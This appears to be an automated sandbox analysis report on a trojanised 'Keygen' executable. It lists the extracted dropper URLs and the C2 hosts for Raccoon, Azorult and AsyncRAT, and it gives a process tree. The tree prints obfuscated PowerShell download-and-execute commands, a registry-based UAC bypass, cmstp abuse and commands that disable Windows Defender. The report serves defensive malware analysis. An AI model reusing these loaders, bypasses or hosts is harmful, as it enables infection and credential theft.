Resubmissions
18-11-2020 14:18
201118-dj27sn3f52 1018-11-2020 13:42
201118-1arz86e7w6 1018-11-2020 13:38
201118-n8jh228ctn 10Analysis
-
max time kernel
1802s -
max time network
1815s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-11-2020 13:42
General
-
Target
Keygen.bin.exe
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://rbcxvnb.ug/zxcvb.exe
exe.dropper
http://rbcxvnb.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://zxvbcrt.ug/zxcvb.exe
exe.dropper
http://zxvbcrt.ug/zxcvb.exe
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhHT
exe.dropper
http://bit.do/fqhHT
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJv
exe.dropper
http://bit.do/fqhJv
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://bit.do/fqhJD
exe.dropper
http://bit.do/fqhJD
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://pdshcjvnv.ug/zxcvb.exe
exe.dropper
http://pdshcjvnv.ug/zxcvb.exe
Extracted
Family
raccoon
Botnet
c6f4c67877b4427c759f396ca4c1dff4761d3cc9
Attributes
-
url4cnc
https://telete.in/brikitiki
rc4.plain
rc4.plain
Extracted
Family
azorult
C2
http://195.245.112.115/index.php
Extracted
Family
asyncrat
Version
0.5.7B
C2
agentttt.ac.ug:6970
agentpurple.ac.ug:6970
Mutex
AsyncMutex_6SI8OkPnk
Attributes
-
aes_key
16dw6EDbQkYZp5BTs7cmLUicVtOA4UQr
-
anti_detection
false
-
autorun
false
-
bdos
false
-
delay
Default
-
host
agentttt.ac.ug,agentpurple.ac.ug
-
hwid
3
- install_file
-
install_folder
%AppData%
-
mutex
AsyncMutex_6SI8OkPnk
-
pastebin_config
null
-
port
6970
-
version
0.5.7B
aes.plain
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Contains code to disable Windows Defender 10 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Oski
Oski is an infostealer targeting browser data, crypto wallets.
-
Raccoon
Simple but powerful infostealer which was very active in 2019.
-
Async RAT payload 3 IoCs
-
ModiLoader First Stage 2 IoCs
-
Blocklisted process makes network request 6 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 35 IoCs
-
Modifies Installed Components in the registry 2 TTPs
-
Loads dropped DLL 22 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Windows security modification 2 TTPs 3 IoCs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 2 IoCs
-
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Suspicious use of SetThreadContext 12 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 12 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Delays execution with timeout.exe 4 IoCs
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Kills process with taskkill 4 IoCs
-
Modifies registry class 30 IoCs
-
Modifies registry key 1 TTPs 2 IoCs
-
Modifies system certificate store 2 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: MapViewOfSection 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 49 IoCs
-
Suspicious use of SendNotifyMessage 38 IoCs
-
Suspicious use of SetWindowsHookEx 13 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\790E.tmp\start.bat" C:\Users\Admin\AppData\Local\Temp\Keygen.bin.exe"2⤵
- Modifies registry class
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\790E.tmp\Keygen.exeKeygen.exe3⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\pvr.exe"C:\Users\Public\pvr.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 13⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL omdrklgfia $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;omdrklgfia yvshnex $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|yvshnex;omdrklgfia gemjhbnrwydsof $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKdg==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);gemjhbnrwydsof $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\txi.exe"C:\Users\Public\txi.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe"{path}"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 5044 & erase C:\Users\Admin\AppData\Local\Temp\oscjgfhwvvas.exe & RD /S /Q C:\\ProgramData\\135572298009183\\* & exit9⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 504410⤵
- Kills process with taskkill
-
C:\Users\Admin\AppData\Local\Temp\axcjgfhwvvas.exe"{path}"7⤵
- Executes dropped EXE
-
C:\Users\Public\txi.exe"{path}"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"C:\Users\Admin\AppData\Local\Temp\Q0ASSF3gqn.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\eJZoW1GjJt.exe"C:\Users\Admin\AppData\Local\Temp\eJZoW1GjJt.exe"7⤵
- Executes dropped EXE
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"C:\Users\Admin\AppData\Local\Temp\tdwmwhz8zi.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\hazyeme1.inf9⤵
-
C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"C:\Users\Admin\AppData\Local\Temp\1nONCENDZY.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\txi.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\b1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL ftdrmoulpbhgsc $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;ftdrmoulpbhgsc rfmngajuyepx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|rfmngajuyepx;ftdrmoulpbhgsc hnjmzobgr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3Bkc2hjanZudi51Zy96eGN2Yi5leGU=';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);hnjmzobgr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\timeout.exetimeout 23⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\ba.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL vfudzcotabjeq $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;vfudzcotabjeq urdjneqmx $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|urdjneqmx;vfudzcotabjeq wuirkcyfmgjql $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhKRA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);wuirkcyfmgjql $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Public\mkx.exe"C:\Users\Public\mkx.exe"5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"C:\Users\Admin\AppData\Local\Temp\zVhjgfutyFD.exe"7⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /pid 4668 & erase C:\Users\Admin\AppData\Local\Temp\HuytgfGDFwer.exe & RD /S /Q C:\\ProgramData\\523709105068992\\* & exit8⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /pid 46689⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Public\mkx.exe"C:\Users\Public\mkx.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops desktop.ini file(s)
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"C:\Users\Admin\AppData\Local\Temp\3glqQ5zu6q.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\FcIiEO8Bol.exe"C:\Users\Admin\AppData\Local\Temp\FcIiEO8Bol.exe"7⤵
- Executes dropped EXE
- Adds Run key to start application
- Modifies system certificate store
-
C:\Windows\SysWOW64\svchost.exe"C:\Windows\System32\svchost.exe"8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\hJiKhtso.bat" "9⤵
-
C:\Windows\SysWOW64\reg.exereg delete hkcu\Environment /v windir /f10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\reg.exereg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\x.bat reg delete hkcu\Environment /v windir /f && REM "10⤵
- Modifies registry key
-
C:\Windows\SysWOW64\schtasks.exeschtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I10⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Public\hJiKhtso.bat" "9⤵
-
C:\Program Files (x86)\internet explorer\ieinstal.exe"C:\Program Files (x86)\internet explorer\ieinstal.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"C:\Users\Admin\AppData\Local\Temp\Zfog5KVMBE.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
\??\c:\windows\SysWOW64\cmstp.exe"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\rnwabiyd.inf9⤵
-
C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"C:\Users\Admin\AppData\Local\Temp\SmMNW0P9JH.exe"8⤵
- Executes dropped EXE
- Windows security modification
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose9⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\mkx.exe"7⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK8⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\790E.tmp\ba1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL wvroy $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;wvroy bwskyfgqtipu $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bwskyfgqtipu;wvroy shlevpgb $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3JiY3h2bmIudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);shlevpgb $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Windows\temp\vokybpfg.exe2⤵
-
C:\Windows\temp\vokybpfg.exeC:\Windows\temp\vokybpfg.exe3⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" Get-MpPreference -verbose4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true4⤵
- Suspicious use of AdjustPrivilegeToken
-
